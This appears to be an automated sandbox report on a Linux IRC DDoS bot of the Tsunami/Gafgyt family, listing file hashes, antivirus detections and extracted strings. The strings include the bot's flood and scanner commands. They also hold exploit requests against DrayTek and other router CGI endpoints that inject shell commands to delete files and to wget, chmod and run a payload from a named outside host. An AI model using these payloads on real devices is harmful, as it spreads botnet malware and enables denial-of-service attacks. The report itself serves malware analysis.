Analysis

Category FILE
Started 2020-04-14 00:10:08
Completed 2020-04-14 00:11:37
Duration 89 seconds
2020-04-04 06:39:49,028 [root] ERROR: Traceback (most recent call last):
  File "C:/tmpp11a79hs/analyzer.py", line 1534, in <module>
    analyzer.prepare()
  File "C:/tmpp11a79hs/analyzer.py", line 234, in prepare
    self.options = self.config.get_options()
  File "C:\tmpp11a79hs\lib\core\config.py", line 46, in get_options
    key, value = field.split("=", 1)
ValueError: not enough values to unpack (expected 2, got 1)
2020-04-04 06:39:49,028 [root] WARNING: Folder at path "C:\uguFtTQkN\debugger" does not exist, skip.
2020-04-04 06:39:49,028 [root] ERROR: Analyzer object has no attribute 'command_pipe'

Machine

Name win7_2
Label win7_2
Manager KVM
Started On 2020-04-14 00:10:08
Shutdown On 2020-04-14 00:11:37

File Details

File Name file
File Size 102628 bytes
File Type ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
MD5 7040a2ce4e8e07ec854723c4006a0a02
SHA1 f97c0b21d09f3e1ec5f78ad70b1627eea271694f
SHA256 f21a9dc8f9c16a942e9c18729813bd3fb9f6e1408df68731160d7fe506f29bc6
SHA512 5ac40121639270da99f4a1adec1a961cc78b5744bbbd5d3c04bb35c9ee7c5d6054bc9a1f650df4da5cbb8c08b6c6ad6dab01acb59688f8faf8a59707815cb1c8
CRC32 CC83B859
Ssdeep 3072:MCqIK8/msNAjjrZvV2Al4YXqSqx0ZeqxgUCz:MwK8usSzHB4YXqSqx0ZeqxgUCz
Yara
  • shellcode_get_eip - Match x86 that appears to fetch $PC. - Author: William Ballenthin

Signatures

File has been identified by 37 Antiviruses on VirusTotal as malicious
DrWeb: Linux.BackDoor.Tsunami.1211
MicroWorld-eScan: Gen:Variant.Backdoor.Linux.Tsunami.1
ALYac: Backdoor.Linux.Tsunami
Sangfor: Malware
BitDefenderTheta: Gen:NN.Mirai.34106
Cyren: ELF/Backdoor.BQWR-
Symantec: Trojan.Gen.2
ESET-NOD32: a variant of Linux/IRCBot.P
TrendMicro-HouseCall: Backdoor.Linux.BASHLITE.SMJC11
Avast: ELF:Gafgyt-KR [Trj]
Kaspersky: HEUR:Backdoor.Linux.Tsunami.ci
BitDefender: Gen:Variant.Backdoor.Linux.Tsunami.1
AegisLab: Trojan.Linux.Tsunami.m!c
Tencent: Trojan.Linux.Tsunami.bp
Ad-Aware: Gen:Variant.Backdoor.Linux.Tsunami.1
Sophos: Mal/Generic-S
Comodo: [email protected]#27zsk2swq5vbs
F-Secure: Malware.LINUX/IRCBot.xqfhe
TrendMicro: Backdoor.Linux.BASHLITE.SMJC11
McAfee-GW-Edition: Linux/HeliBot!7040A2CE4E8E
FireEye: Gen:Variant.Backdoor.Linux.Tsunami.1
Emsisoft: Gen:Variant.Backdoor.Linux.Tsunami.1 (B)
Ikarus: Trojan.Linux.Gafgyt
Antiy-AVL: Trojan[Backdoor]/Linux.Tsunami.ci
Microsoft: Trojan:Win32/Skeeyah.A!rfn
Arcabit: Trojan.Backdoor.Linux.Tsunami.1
ZoneAlarm: HEUR:Backdoor.Linux.Tsunami.ci
Avast-Mobile: ELF:Gafgyt-KS [Trj]
GData: Gen:Variant.Backdoor.Linux.Tsunami.1
AhnLab-V3: Linux/Gafgyt.Gen44
McAfee: Linux/HeliBot!7040A2CE4E8E
MAX: malware (ai score=100)
Rising: Backdoor.Tsunami!8.E80 (TFE:14:Dta0bK8g7TF)
SentinelOne: DFI - Malicious ELF
Fortinet: ELF/Gafgyt.BJ!tr
AVG: ELF:Gafgyt-KR [Trj]
Qihoo-360: Linux/Backdoor.c7a

Screenshots

No screenshots available.

Hosts

No hosts contacted.

DNS

No domains contacted.


Summary

No static analysis available.
gethostbyname
NOTICE %s :unable to comply
PRIVMSG %s :unable to resolve %s
8.8.8.8
/proc/net/route
00000000
(null)
%s : USERID : UNIX : %s
Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS
PRIVMSG %s :Usage: !* UDP <host> <port> <time> 32 1024 10
PRIVMSG %s :attack has been started on %s
PRIVMSG %s :Usage: !* HEX <host> <port> <time> 1024
PRIVMSG %s :Usage: !* DNS <host> <port> <time>
PRIVMSG %s :[XTC] # # # # # # # # # # D D O S - C O M M A N D S # # # # # # # # # #
PRIVMSG %s :[XTC] !* UDP <host> <port> <time> 32 <packetsize> 10 - UDP FLOOD
PRIVMSG %s :[XTC] !* HEX <host> <port> <time> <packetsize> - HEX FLOOD
PRIVMSG %s :[XTC] !* DNS <host> <port> <time> - DNS FLOOD
PRIVMSG %s :[XTC] # # # # # # # # # # O T H E R - C O M M A N D S # # # # # # # # #
PRIVMSG %s :[XTC] !* DRAYTEK <start/<stop> - START DRAYTEK SCANNER
PRIVMSG %s :[XTC] !* UCM <start/<stop> - START UCM SCANNER
PRIVMSG %s :[XTC] !* HELP - COMMAND HELP
PRIVMSG %s :[XTC] !* RULES - BOTNET RULES
PRIVMSG %s :[XTC] !* INFO - ABOUT THE BOT
PRIVMSG %s :[XTC] # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
PRIVMSG %s :[XTC] # # # # # # # # # # B O T N E T - R U L E S # # # # # # # # # # #
PRIVMSG %s :[XTC] 1. do not spam attacks
PRIVMSG %s :[XTC] 2. do not share this irc server
PRIVMSG %s :[XTC] 3. do not attack this irc server
PRIVMSG %s :[XTC] 4. do not start multible scanners per once
PRIVMSG %s :[XTC] 5. do not hit any type of goverments
PRIVMSG %s :[XTC] 6. respect all other customers
PRIVMSG %s :[XTC] 7. respect the botnet administrators
PRIVMSG %s :[XTC] # # # # # # # # # # A B O U T - T H E - B O T # # # # # # # # # #
PRIVMSG %s :[XTC] weapomized ddos malware includes powerfull ddos methods
PRIVMSG %s :[XTC] who bypass the most firewalls. advanched bot killer to destroy
PRIVMSG %s :[XTC] all most common mirai, qbot, kaiten bot proccesses
PRIVMSG %s :[XTC] fast selfreplication on every infected bot without raw socket.
PRIVMSG %s :[XTC] developed and completed by viktor sanchez. contact me on
PRIVMSG %s :[XTC] jabber under [email protected] for botnet services.
NOTICE %s :Usage: !* DRAYTEK <start/stop>
start
PRIVMSG %s :draytek scanner started
PRIVMSG %s :draytek scanner stopped
NOTICE %s :Usage: !* UCM <start/stop>
PRIVMSG %s :ucm scanner started
PRIVMSG %s :ucm scanner stopped
DRAYTEK
RULES
POPPINSHELLZ
export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
NOTICE %s :%s
MODE %s -x
JOIN %s :%s
WHO %s
PONG %s
PRIVMSG
/dev/null
#hellroom
NICK %s
USER %s localhost localhost :%s
ERROR
POST /cgi-bin/mainfunction.cgi HTTP/1.0
User-Agent: XTC
Host: 127.0.0.1
Content-Length: 89
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=login&keyPath=%27%0Arm${IFS}-rf${IFS}%2ftmp%2f*%0A%27&loginUser=a&loginPwd=a
POST /cgi-bin/mainfunction.cgi HTTP/1.1
User-Agent: XTC
Host: 127.0.0.1
Content-Length: 89
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=login&keyPath=%27%0Arm${IFS}-rf${IFS}%2ftmp%2f*%0A%27&loginUser=a&loginPwd=a
POST /cgi-bin/mainfunction.cgi HTTP/1.0
User-Agent: XTC
Host: 127.0.0.1
Content-Length: 89
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=login&keyPath=%27%0Awget${IFS}http:%2f%2firc.hoaxcalls.pw%2fsh${IFS}-O${IFS}%2ftmp%2fupnp.debug_01;${IFS}chmod${IFS}777${IFS}%2ftmp%2fupnp.debug_01;${IFS}sh${IFS}%2ftmp%2fupnp.debug_01%0A%27&loginUser=a&loginPwd=a
POST /cgi-bin/mainfunction.cgi HTTP/1.1
User-Agent: XTC
Host: 127.0.0.1
Content-Length: 89
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=login&keyPath=%27%0Awget${IFS}http:%2f%2firc.hoaxcalls.pw%2fsh${IFS}-O${IFS}%2ftmp%2fupnp.debug_02;${IFS}chmod${IFS}777${IFS}%2ftmp%2fupnp.debug_02;${IFS}sh${IFS}%2ftmp%2fupnp.debug_02%0A%27&loginUser=a&loginPwd=a
POST /cgi HTTP/1.0
User-Agent: XTC
Accept: application/json
Content-Type: application/json
admin' or 1=1--`;`rm${IFS}-rf${IFS}/tmp/*`;`
POST /cgi HTTP/1.1
User-Agent: XTC
Accept: application/json
Content-Type: application/json
admin' or 1=1--`;`rm${IFS}-rf${IFS}/tmp/*`;`
POST /cgi HTTP/1.0
User-Agent: XTC
Accept: application/json
Content-Type: application/json
admin' or 1=1--`;`wget${IFS}http://irc.hoaxcalls.pw/arm7${IFS}-O${IFS}/tmp/upnp.debug_01;${IFS}chmod${IFS}777${IFS}/tmp/upnp.debug_01;${IFS}/tmp/upnp.debug_01`;`
POST /cgi HTTP/1.1
User-Agent: XTC
Accept: application/json
Content-Type: application/json
admin' or 1=1--`;`wget${IFS}http://irc.hoaxcalls.pw/arm7${IFS}-O${IFS}/tmp/upnp.debug_02;${IFS}chmod${IFS}777${IFS}/tmp/upnp.debug_02;${IFS}/tmp/upnp.debug_02`;`
bin:
/bin/sh
(nil)
(null)
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
0123456789abcdef
/etc/hosts
/etc/config/hosts
GCC: (GNU) 4.1.2

Full Results

Engine: Signature
Bkav: Clean
DrWeb: Linux.BackDoor.Tsunami.1211
MicroWorld-eScan: Gen:Variant.Backdoor.Linux.Tsunami.1
CMC: Clean
CAT-QuickHeal: Clean
ALYac: Backdoor.Linux.Tsunami
Malwarebytes: Clean
VIPRE: Clean
Sangfor: Malware
K7AntiVirus: Clean
K7GW: Clean
BitDefenderTheta: Gen:NN.Mirai.34106
Cyren: ELF/Backdoor.BQWR-
Symantec: Trojan.Gen.2
ESET-NOD32: a variant of Linux/IRCBot.P
TrendMicro-HouseCall: Backdoor.Linux.BASHLITE.SMJC11
Avast: ELF:Gafgyt-KR [Trj]
Kaspersky: HEUR:Backdoor.Linux.Tsunami.ci
BitDefender: Gen:Variant.Backdoor.Linux.Tsunami.1
NANO-Antivirus: Clean
ViRobot: Clean
AegisLab: Trojan.Linux.Tsunami.m!c
Tencent: Trojan.Linux.Tsunami.bp
Ad-Aware: Gen:Variant.Backdoor.Linux.Tsunami.1
Sophos: Mal/Generic-S
Comodo: [email protected]#27zsk2swq5vbs
F-Secure: Malware.LINUX/IRCBot.xqfhe
Baidu: Clean
Zillya: Clean
TrendMicro: Backdoor.Linux.BASHLITE.SMJC11
McAfee-GW-Edition: Linux/HeliBot!7040A2CE4E8E
FireEye: Gen:Variant.Backdoor.Linux.Tsunami.1
Emsisoft: Gen:Variant.Backdoor.Linux.Tsunami.1 (B)
Ikarus: Trojan.Linux.Gafgyt
F-Prot: Clean
Jiangmin: Clean
Antiy-AVL: Trojan[Backdoor]/Linux.Tsunami.ci
Kingsoft: Clean
Microsoft: Trojan:Win32/Skeeyah.A!rfn
Arcabit: Trojan.Backdoor.Linux.Tsunami.1
SUPERAntiSpyware: Clean
ZoneAlarm: HEUR:Backdoor.Linux.Tsunami.ci
Avast-Mobile: ELF:Gafgyt-KS [Trj]
GData: Gen:Variant.Backdoor.Linux.Tsunami.1
TACHYON: Clean
AhnLab-V3: Linux/Gafgyt.Gen44
McAfee: Linux/HeliBot!7040A2CE4E8E
MAX: malware (ai score=100)
VBA32: Clean
Zoner: Clean
Rising: Backdoor.Tsunami!8.E80 (TFE:14:Dta0bK8g7TF)
Yandex: Clean
SentinelOne: DFI - Malicious ELF
MaxSecure: Clean
Fortinet: ELF/Gafgyt.BJ!tr
AVG: ELF:Gafgyt-KR [Trj]
Panda: Clean
Qihoo-360: Linux/Backdoor.c7a

Sorry! No behavior.

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.

Processing ( 5.962000000000001 seconds )

  • 5.347 Suricata
  • 0.438 VirusTotal
  • 0.081 CAPE
  • 0.073 TargetInfo
  • 0.014 AnalysisInfo
  • 0.004 Debug
  • 0.003 Strings
  • 0.001 BehaviorAnalysis
  • 0.001 NetworkAnalysis

Signatures ( 0.04800000000000001 seconds )

  • 0.01 ransomware_files
  • 0.006 antiav_detectreg
  • 0.005 ransomware_extensions
  • 0.004 antiav_detectfile
  • 0.003 persistence_autorun
  • 0.003 infostealer_bitcoin
  • 0.003 infostealer_ftp
  • 0.002 infostealer_im
  • 0.002 infostealer_mail
  • 0.001 kibex_behavior
  • 0.001 tinba_behavior
  • 0.001 antianalysis_detectfile
  • 0.001 antianalysis_detectreg
  • 0.001 antivm_vbox_files
  • 0.001 geodo_banking_trojan
  • 0.001 browser_security
  • 0.001 disables_browser_warn
  • 0.001 masquerade_process_name
  • 0.001 revil_mutexes

Reporting ( 0.884 seconds )

  • 0.842 BinGraph
  • 0.042 JsonDump